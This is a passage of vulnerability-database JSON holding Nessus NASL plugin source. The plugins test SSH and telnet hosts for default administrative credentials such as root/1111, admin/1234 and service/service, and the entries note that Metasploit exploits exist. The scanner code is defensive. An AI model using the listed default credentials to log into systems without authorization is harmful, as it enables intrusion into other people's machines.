script_name(english:\"Default Password 'supervisor' for 'supervisor' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'supervisor' on the remote host has the default password\n'supervisor'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:04", "description": "The account 'root' on the remote host has the default password 'ikwb'.\nA remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'ikwb' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_IKWB.NASL", "href": "https://www.tenable.com/plugins/nessus/94390", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"ikwb\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94390);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'ikwb' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password 'ikwb'.\nA remote attacker can exploit this issue to gain administrative access\nto the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:03:39", "description": "The account 'operator' on the remote host has the password 'profense'. An attacker may leverage this to gain total control of the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2009-01-31T00:00:00", "type": "nessus", "title": "Default Password (profense) for 'operator' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_OPERATOR_PROFENSE.NASL", "href": "https://www.tenable.com/plugins/nessus/35559", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"operator\";\npassword = \"profense\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35559);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (profense) for 'operator' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'operator' on the remote host has the password 'profense'. \nAn attacker may leverage this to gain total control of the affected\nsystem.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:08:01", "description": "The account 'root' on the remote host has the default password '1111'.\nA remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '1111' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_1111.NASL", "href": "https://www.tenable.com/plugins/nessus/94377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"1111\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94377);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '1111' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password '1111'.\nA remote attacker can exploit this issue to gain administrative access\nto the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:08:01", "description": "The account 'admin' on the remote host has the default password '1234'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '1234' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_1234.NASL", "href": "https://www.tenable.com/plugins/nessus/94362", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"1234\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94362);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '1234' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'1234'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:07:31", "description": "The account 'root' on the remote host has the default password 'jvbzd'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'jvbzd' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_JVBZD.NASL", "href": "https://www.tenable.com/plugins/nessus/94392", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"jvbzd\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94392);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'jvbzd' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'jvbzd'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:07:31", "description": "The account 'service' on the remote host has the default password 'service'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'service' for 'service' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_SERVICE_SERVICE.NASL", "href": "https://www.tenable.com/plugins/nessus/94403", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"service\";\npassword = \"service\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94403);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'service' for 'service' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'service' on the remote host has the default password\n'service'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:07:31", "description": "The account 'root' on the remote host has the default password 'klv1234'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'klv1234' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_KLV1234.NASL", "href": "https://www.tenable.com/plugins/nessus/94394", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"klv1234\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94394);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'klv1234' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'klv1234'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif 